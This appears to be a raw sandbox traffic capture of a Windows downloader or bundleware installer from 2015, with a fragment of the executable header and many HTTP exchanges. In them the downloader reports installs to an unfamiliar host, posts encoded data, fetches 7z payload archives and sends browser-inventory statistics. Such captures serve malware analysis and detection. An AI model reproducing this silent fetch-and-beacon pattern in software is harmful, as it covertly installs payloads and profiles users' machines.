Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........`p.........
....8O..................f....y.......................y.......v........
..............................Rich............................PE..L...
.,.T............................#2....................................
................@..........................@..\..../..................
.....~..........L...P...............................x...@.............
..d............................text............................... ..`
.rdata...F.......H..................@..@.data........P...`...4........
......@....rsrc...............................@..@.reloc..............
................@..B..................................................
......................................................................
......................................................................
......................................................................
............................................U..j.h[...d.....PV..v..3.P
.E.d......u.3.j..N....P.A......A.....Rf...(....U.3.j..N .E.....P.A....
..A.....Rf..........M.d......Y^..]..............U..j.h^...d.....P..(..
v..3..E.SWP.E.d......u..E......>........E.h.Y...^ P.RT...........E.
.9P.r.......9V..F.r...QP......e.j.3..A......A.....hp..........Z..f....
........e..........$9}.r..E.P.`.............9~4r..N Q.H...........3..^
4.F0....f.V 9~.r..F.P."......3..^..F.....f.N..M.d......Y_[.M.3........
]....U..j.h....d.....P...VW..v..3.P.E.d........u..E......~(.}..E..

<<< skipped >>>

GET /update?rnd=410912142275&p=gomail&t=gomail_main&v=782 HTTP/1.1

Host: gomail.radar.imgsmail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:34 GMT

Server: imagine/radar (5115861e)

Connection: close

X-Content-Type-Options: nosniff

Content-Length: 43

Content-Type: image/gif

GIF89a.............!.......,...........L..;..

GET /static/web/css/main.css?7bf07569 HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: text/css,*/*;q=0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:33 GMT

Content-Type: text/css

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:33 GMT

Cache-Control: max-age=864000

Access-Control-Allow-Origin: *

Content-Encoding: gzip
4cd3.............}Ys.H.........{,H.7..s$Y..]....H.$Z$.&@-V......U(....
.=..t7....Un.U.E...0...M..b/..E.......~.p....r............_.V.q.\y..&l
t;.vn..h........a ../.l..g.,....=..*.......... ....G3..mz./....;.....r
..4.L.'....X.T.....Bw.:...'..;.{w.`=....F..B./.....x.Sr..y..?.V[...{..
.....|.jV..........sC..................n...0.....s.....x.......{..z#,|
7.C..m.8.F....et....u.a..7..N.P...H......<........'...s...f.....&mh
.'Zd... .%.gdwB......KO..z..{..>t......?.2......C...............~.[
................}...Gws?..0..{Nt....`..&.IP$...s?&...B.!....Dq....:.}.
..m........_....I...p.....D2M`..lj.*q...{.y7.3.F..V.,...Q.?.n.%a.xkdU\
|..#Iom..`..K....s..b0.o..b..i.<....%Z..h..W7.......N.p.V....U?!).`
.w..CC....u....r`..{f..}......./....=....w..;..K\.Q.8.....D.....;..\c.
!..J.....>.(h...3H.S.|b....1.1\.e..)..#.gI..u*~..,@2....Gh...EJ}.. 
..f*..`.z._...o....a..btp...@.. ...j.r|....w.Wm?.U...s#XD..E.)....M...
.^...."..I...s.vJ...e.L!r.BEu......o.>q&.k...T....\..eC...~.}......
J......E..{y0].N...N......A._.........JN...R.....w .r~[.{....w9.<v`
.]...6....G...o....U.R.o=.KV..."...:N..K.rP.....a....BM....V7i-kE.....
rgJO........L.9.r.(...b.0Hh9...$.....(..-....Mf....B..Pq?.~...dG....u.
.4K.,....Q(.I.=.u.].r.&...TK0....sA....i......`...c...eTI...3q{.......
}@.?.....}#,Y.2R.....R%.1....;B..z.........F....fx..'..X...R_.}.......
....m.u..D..y......[...R....nK..t.0 C...j.g.......#h.Y...E..,...;9.*e.
I......h..1\.X.^yc...9QA..cl.....2W.....=.z.^......E......../V.:r...O.
~c.._;T.\9..U......c.Q.K..;.OW....x..6........^u..._...t....)r.X;.<<< skipped >>>

GET /touch_install?name=go_search_desktop.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=43dc7e69b16c87d642564ef4260203eb29efd0c7ef3e604b49815cb3e95dc36f&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:34:20 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:34:19 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCECJe6gdYhONI6dBjwD1kE+o= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=474265, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 21:17:36 GMT

Expires: Sat, 28 Feb 2015 21:17:36 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
1211736Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U..."^..X..H..c.=d......20150221211736Z....20150228211736Z0...*.H.....
.........k....?y..G.M.....l..&.......m.....I|....uC.b3.Q..<Ta.{NP.I
R<............z....L.k..Q...q..;Q.`%.I..y.....,JS.-..2.#.....3.....
.].......{<.%.......@..m....d....M..'...z...6.nb.....2{d.-p.G7...?*
u0.......gNu...Q.!.k..Wv ...h.,...*j..1..........b..s....d.Y.n.....0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

GET /speeddials/partner/yahoo HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/yahoo_other/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601653

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/facebook_other/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "7a4d5d-54ba-50ecea1134600"

Content-Type: image/png

Content-Length: 21690

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601677 2598527047

Age: 219

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 442
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:C7A1
B15FBED511E28F85D5EC1B7B836C" xmpMM:InstanceID="xmp.iid:C7A1B15EBED511
E28F85D5EC1B7B836C" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8C7021171320681180
83C1680B1A71F7" stRef:documentID="xmp.did:4905A1941A226811822A85CA6146
66AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>. ....P.IDATx....oe.r.v..g.9O.....yh... N..
..8R.... ...dO.&......'..gE.d)..H...g..!....j.....|.{n..~...w...V....{
_.........\w..ruq.k.*WW6..f.)g........=z.7%.<-....Qvm.~.rW......&..
....s.....rY..5D..n.'....8.........T.t....]...H......o\m~.=.9...W`.-pR
...7.....&3....alR.e.1xer#....`%...!A....E...eW.y.Nw.....Jx.<\a.M.H
!Z...;.lS..#.3.Bg*..wO).T....i.!...#F.#<..7.*........t.1@.%....@...
F....51 .g.....n.l...6..._..y.e.q".....sy......HH.l3...T..b6.<...3O
..6.QZ.$/...sjY..l..s5.....'...cw..em.M7...j,j3.8O.[J.=.Q....Iy.Gr<<< skipped >>>

GET /update/2/version.txt?type=install&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=blackbear1&standalone=1&tool=sputnik&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=7&bgn=1 HTTP/1.1

Host: mrds.mail.ru

Accept: */*

User-Agent: FULLSTUFF

Connection: close


HTTP/1.1 204 No Content

Server: nginx

Date: Mon, 23 Feb 2015 09:32:18 GMT

Connection: close

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR5iK7tYk9tqQEoeQhZNkKcAol9bgQUjEPEy22YwaechGnr30oNYJY6w/sCEEyl/sZhfEiwVjgqgoDgUIw= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: subca.ocsp-certum.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:37 GMT

Content-Type: application/ocsp-response

Content-Length: 1446

Connection: close

Server: ICAS HTTP SERVER/1.1 for UNIZETO Python/2.4.3

Content-transfer-encoding: binary

Expires: Mon, 23 Feb 2015 09:50:37 GMT

Cache-Control: max-age=900

X-Cache: HIT
0..........0..... .....0......0...0.........U0S1.0...U....PL1 0...U...
.Unizeto Technologies SA1"0 ..U....Certum Validation Service..20150223
092531Z0q0o0G0... ......y...bOm..(y.Y6B...}n...C..m.....i..J.`.:....L.
..a|H.V8*...P.....20150223092531Z....20150302092531Z..0.0... .....0...
.0... .....0..0...*.H...........,.=3.*3q..MF...P.`.o..%. .B:X>.?.."
.d...3$....T. 8..{...o_..N_u.......AS...t..{...=2...-.{..p...#........
Sl.#........@.OY/.......O...6......o.B>..<h...C.p.../...... \[.W
.8..^..6..aq0......I..E.....v...e.&\.H.4.3.8d.'b4...'.....Tl.S0.P._...
o....w..............j0..f0..b0..J..........X|y....W..{...0...*.H......
..0>1.0...U....PL1.0...U....Unizeto Sp. z o.o.1.0...U....Certum CA0
...150115000001Z..160216235959Z0S1.0...U....PL1 0...U....Unizeto Techn
ologies SA1"0 ..U....Certum Validation Service0.."0...*.H.............
0..........3..>......]{7..\...$vl.....V......T...-.:.....y..'...X..
}.fA\...._.Uxl6.ti %.SS..#. Z.5.G"..S.....)Q...!..P....~0..32...Bmd...
%.2...D.....J.........6....O.u..vm.l..V.'.L.4.._....\.eK...MI.F.;H.;..
%...KZ...H;e ..9.2..A.b......F.T..._........DY2...2Z#L.D0)......F0D0..
.U.......0.0...U...........0...U.%..0... .......0... .....0......0...*
.H...................LX....=j.Z....|SL..|s`...."....M... ..2UpL3..Ix.@
-.J....~j...'N.g.X..h........vh(...Z.'s..e.x...F}1_.~....J.8l.IO<.{
v./....s...Rn.......|.;w...sx.iJ....j.z.-.n...F.S.eO.p......A..TR.`...
....Kab....o.x..P..._..b..i.i..I...G...IV...]G.....x}.............<<< skipped >>>

POST /get_json?stb=1&did=1497824015&ext_partner_id=&file_id=32888998&rnd=399f10466aadb4ab46aee8d444f5554534411947cf39dabc663334b4ef7e4f1d&delay=3463 HTTP/1.1

Content-Type: multipart/form-data; boundary=M7r63zafGid6aCUtEmgjPN6422BdfO

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Content-Length: 612

Cache-Control: no-cache

--M7r63zafGid6aCUtEmgjPN6422BdfO

Content-Disposition: form-data; name="data"

em.0..t.m......N.c.)j0.)."..-\c"x....P.@.@..a;q......$S..(..(......._...&..-)..-...E.Ut..G.......S/.e...{.(.2j.Z.x9.....2.(...a...p....l....[..i.....z*..[H1.....n.M.......
VK]yyy...k5...|.8||...3.3H.,...
i.O[O3..#...l..5:..<...n. ..<<.d......T3:].....F....f.>..N..\.h9.".....Uc.Z.m..fX......e......2.B.7.S......(..hhx..eU....c...4....\.j......E7..;ff>Z....e....S....29.S...... ... aa..%........,.,.[.~...O~..lsD..OA5.d.5d.5.k....%..l.....y.R.l..<k.y#.D`D.y ..O....D`..b..3w..i:p..u..n..O.....

--M7r63zafGid6aCUtEmgjPN6422BdfO--


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:31:05 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:31:05 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache
a4a.... `.`...3.....e.:A..."-R.Ms..g@M@.w........^.,.....&?..4..q4!:..
...s3k..~...R..R....x.._.'....L...w....}F.^.d.2...M.....&w..X.......p.
....v......vvv.Q...%......i...Qa.$=7.|$...|.V$11.|....B.7.{.<I...0.
......b{{.IDW...\Ü.*....i...i..|..1J.../.7....[.....A..;(Z.........9
......;...........fr.X..!......&f..M2.}Mw.w..,....99;..sZ.(..`.R..^...
..Fe..N.....@E}.K..S....w.}.r...2^...Y..Ee]v.pp.....8......{.I.j.jQ...
6...]8......v..............=.]v......B..0bO.....I..%.0...W..h\h*.h.>
;....U..=.....Ha....z.1..O.....|.R...A.(..............:.f...M.Yrl...T.
...T....l^.G...M..s...........yN.~....?..y.'k.F.. ..e.....e.....K....w
.}K.....l..2&..Xq......D*.{......C>C\..........\..>........7....
7)n<.Ha.z.[..|....z.........{.......u...>..6b....u.W......o...0.
h..\....6O0.....UHz.....lT`T........5m..5.:.NN.."...~..&..&.......w.E.
K22X?..2w..y.....9._..5..(....."9 _..T'_.'...L....Y&....S.!@.......f.4
.......^.|.......v..v%D..]...j8.....>.b....P.....c..17=......iz$i..
........0...b{...D..O.\...u.6......b...[....az...zn....a..)...=#..=.7V
_.....`...(..x..9..3k.T e.".(...w5E:.!.4.@dl..S2..@....r.&.4....9.93Z 
.R.L..3.Le.(_.........Zx...2...4G2......l....!f..d.............p...Q&g
t;.8...u\..vh..Qj.QQ.......=....c......i...|..o.]..[ci...I%b..{uCh...C
[..u.....u.{....{..z....Jz...a|....t=.[.B.#..............~.g.(....f...
..Ng........!..lX...y,..G....5...4...!....`.K.,.&K...k....3..`s....`g'
k.2~...,.&.wKM.^2..G.!.:Y@..r..^.^......>.v...0.**....p..jpD....6..
.W..........1.J..c=.P|.o...........n...IO.........b{{.IDW...\Ü.*<<< skipped >>>

GET /statistic/?status=stats&rand=938&GUID=127548203094016&softid=1&version=1.2.15&wid=1&subid1=1&subid2=1&browsers=chrome_35.0.1916.153,opera_27.0.1689.69,firefox_29.0.1,yandex_0.0.0.0,iexplorer_9.10.9200.16521 HTTP/1.1

Accept: */*

Accept-Language: en-us

Cache-Control: no-cash

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: installsyst.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:29 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

Cache-Control: no-cache

GIF89a.............!.......,...........L..;..

GET /go_ffspt1.7z HTTP/1.1

Host: xtnmailru.cdnmail.ru

Accept: */*

Range: bytes=0-4063118

User-Agent: SputnikInstaller

Connection: close


HTTP/1.1 206 Partial Content

Server: nginx

Date: Mon, 23 Feb 2015 09:32:18 GMT

Content-Type: application/x-7z-compressed

Content-Length: 4063118

Connection: close

Last-Modified: Wed, 17 Dec 2014 16:01:56 GMT

ETag: "5491a8f4-3dff8e"

Content-Range: bytes 0-4063117/4063118
7z..'....I5[H.=.....&.......H.*y.#.D./.' .d....9@..:..~...Ad.B...p|...
..#...d?..F|...d.ny7.i..3.1....[.v..gs..._...`......[..........e.({.j7
5..B..~-..&........5z...#......T.$.u{.......YO.f...z&.t...).n........e
..O.K."Z.....O)#..z..]4..,...-.H".n..........B&.9.Y.....a.'..<E@C..
w.5.v.Br...,.i..........f.r........B9.HT...UVx..yS.RcD.T..:.....$. ..Z
.*(.s.m..9h..w.y..!.l....=9.....N..P.at.7./.....&@.O.B@..<.<....
...0.U...d.,...OB34".........lI...?...n!...6W....0$...c.&V....f?...u..
o.F{}.,........eOU......S...<XrN.[.[.{......X,&?.........rMS.:.....
.NK..%.w..'..! !F.g..\..L81KNZ........ K.#..g.3Z.n|..Xbv......Y.6..g.(
..%G.......v,.6W....'......].0.5.M..uT..1.].'.Jt.I..S.Q.'.....3nn.....
..:...k....2.nb=.F.U..........[k.....D...c.5...*.*.....U.....:.>.&.
u....Q...6....z>E...OC...CH.@L#...q........#...l..=.K..L..D..*l5..i
M..y.&....S.?Ff..FT..>....8b...."}.!x(_....F$.n}.3...o....LZv..H...
.I.i.*8...RG..l.o.O.O.J^..K.^.b2...L.m.rG=n|#......u..}..'r..G....q?..
B..;.,.kz.1 a{%......3...S.|m............C_Q...g.lp....%.i.R.Eb.......
..W.=....c.~..v...|....~.....;q...9[.....6...f...$.....)m...d...zt...a
.s/..5U#...J..]~k....7.. ...6..N...Zs...9Bt........X...p........S..._a
..I..X..T..H.R..M....:..../.....j.b....*..;...Y.....F..=K./...._..m.p.
.....x....a..Q...c..s..."..t..k$...s..sO..c..Ue.,D...GnB^{.fD..?..E/7_
'....V.g.U(....y....w.w\..\....^.m'..U...........ny.....S.^..i1_.ar.E.
....J[..P.d...%5.&..g.....f.......tr. ......w.'.42!v.4...ab..R>#...
...8.1.Gi..Cw.X...j.9G...^.......lT.......E..wS..2..E.n.*......-&l<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCECJe6gdYhONI6dBjwD1kE+o= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=474265, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 21:17:36 GMT

Expires: Sat, 28 Feb 2015 21:17:36 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
1211736Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U..."^..X..H..c.=d......20150221211736Z....20150228211736Z0...*.H.....
.........k....?y..G.M.....l..&.......m.....I|....uC.b3.Q..<Ta.{NP.I
R<............z....L.k..Q...q..;Q.`%.I..y.....,JS.-..2.#.....3.....
.].......{<.%.......@..m....d....M..'...z...6.nb.....2{d.-p.G7...?*
u0.......gNu...Q.!.k..Wv ...h.,...*j..1..........b..s....d.Y.n.....0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

GET /counter?id=631797;;r=;j=true;s=1716*901;d=24;rand=0.2730049511883408 HTTP/1.1

Host: dc.cc.bf.a1.top.mail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Moved Temporarily

Server: top.mail.ru/2.1

Date: Mon, 23 Feb 2015 09:35:34 GMT

X-Content-Type-Options: nosniff

Location: hXXp://top-fwz1.mail.ru/counter?id=631797;;r=;j=true;s=1716*901;d=24;rand=0.2730049511883408

P3P: CP="NOI DSP COR NID CUR PSA OUR NOR"

Set-Cookie: FTID=31YlJd30my1J:1424684134:631797:::; path=/; expires=Wed, 24 Feb 2016 09:35:34 GMT; domain=.mail.ru

Cache-control: private, no-cache, no-store, max-age=0

Pragma: no-cache

Content-Length: 0

Connection: keep-alive

Keep-Alive: timeout=60
HTTP/1.1 302 Moved Temporarily..Server: top.mail.ru/2.1..Date: Mon, 23
 Feb 2015 09:35:34 GMT..X-Content-Type-Options: nosniff..Location: htt
p://top-fwz1.mail.ru/counter?id=631797;;r=;j=true;s=1716*901;d=24;rand
=0.2730049511883408..P3P: CP="NOI DSP COR NID CUR PSA OUR NOR"..Set-Co
okie: FTID=31YlJd30my1J:1424684134:631797:::; path=/; expires=Wed, 24 
Feb 2016 09:35:34 GMT; domain=.mail.ru..Cache-control: private, no-cac
he, no-store, max-age=0..Pragma: no-cache..Content-Length: 0..Connecti
on: keep-alive..Keep-Alive: timeout=60......

HEAD /go_chvbm6.7z HTTP/1.1

Host: xtnmailru.cdnmail.ru

Connection: close


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:18 GMT

Content-Type: application/x-7z-compressed

Content-Length: 3904817

Connection: close

Last-Modified: Wed, 17 Dec 2014 16:01:56 GMT

ETag: "5491a8f4-3b9531"

Accept-Ranges: bytes

GET /launch_install?name=Opera_ua.exe&hash=f0b99c0b0e005bdb5acb5ad7f2d77fd8c8f041abf8e4f52d8a529908c7321011&md5=2937e29c43a65938cb46b8e76558222f&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:31:20 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:31:20 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET /s/a/bing_p.ico HTTP/1.1

Host: VVV.bing.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Cache-Control: public, max-age=15552000

Content-Length: 1150

Content-Type: image/x-icon

Last-Modified: Sat, 19 Oct 2013 01:08:06 GMT

Vary: Accept-Encoding

Server: Microsoft-IIS/8.5

Date: Mon, 23 Feb 2015 09:31:30 GMT

............ .h.......(....... ..... .....@...........................
......................................................................
......................................................................
LVZ.G\e.................................................3u..PPP.PPP.PP
P.PPP.:m..........................................Bbn.3w..OQR.PPP.PPP.
PPP.NRS. ...................................PPP.E^g.....4t..PPQ.PPP.PP
P.PPP.G\c.............................PPP.PPP.Cam.........9n..PPP.PPP.
PPP.PPP.........................PPP.PPP.PPP.............6r..PPP.PPP.PP
P.........................PPP.PPP.PPP.........LUY.PPP.PPP.PPP.PPP.....
....................PPP.PPP.PPP.....1y..PPP.PPP.G\d..|................
..............PPP.PPP.PPP.....?gv.(...................................
........PPP.PPP.PPP...................................................
..PPP.PPP.F]e.....................................................PPP.
Cal.'.................................................................
......................................................................
......................................NT..IE..In..l6..Fa..ly.. M..el..
5 ..ep..ng.., ..nu..eI..el..ROHTTP/1.1 200 OK..Cache-Control: public, 
max-age=15552000..Content-Length: 1150..Content-Type: image/x-icon..La
st-Modified: Sat, 19 Oct 2013 01:08:06 GMT..Vary: Accept-Encoding..Ser
ver: Microsoft-IIS/8.5..Date: Mon, 23 Feb 2015 09:31:30 GMT...........
... .h.......(....... ..... .....@....................................
..................................................................

<<< skipped >>>

GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBQmECJms4f7i5EbxtN7NbzQCBwAdAQUUa8kJpz0aCJXgCYrO0ZiFXsezKUCE1oAAHevvgBk+xJc0C0AAQAAd68= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.msocsp.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:32:31 GMT

Content-Type: application/ocsp-response

Content-Length: 1757

Connection: keep-alive

Set-Cookie: __cfduid=de6c9470fc9b6eddf321dea9d7098a9961424683951; expires=Tue, 23-Feb-16 09:32:31 GMT; path=/; domain=.msocsp.com; HttpOnly

Last-Modified: Thu, 19 Feb 2015 03:11:58 GMT

Expires: Mon, 23 Feb 2015 03:11:58 GMT

ETag: "13515fcfa040b497356aa40b58effca759ac8719"

Cache-Control: max-age=345599,public,no-transform,must-revalidate

X-Cache: HIT

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 1bd26aab6c160c71-AMS
0..........0..... .....0......0...0..........<.|7...@N6p.I.e|..2015
0219031158Z0..0..0L0... ........&."f........{5.....t..Q.$&..h"W.& ;Fb.
{.....Z..w...d..\.-....w.....20150219031158Z....20150223031158Z."0 0..
. .....0......20140219031158Z0...*.H.................#w.Q......<b..
G^...P./.....S .O^.~.n...../..?..G......C"t~..../..H........0.ujH.;...
..T..v...mvy...g...........f.$e...^ ...q.Dx'.L..........p..YpWC.($..L.
Ng...b....g...y,.G.4.&.lI.8......w.E.....r......&...F....bA.]......Z..
a...N........."4.~...\z.........0...0...0..........Z..~..M..<ZYJ...
.~.0...*.H........0..1.0...U....US1.0...U....Washington1.0...U....Redm
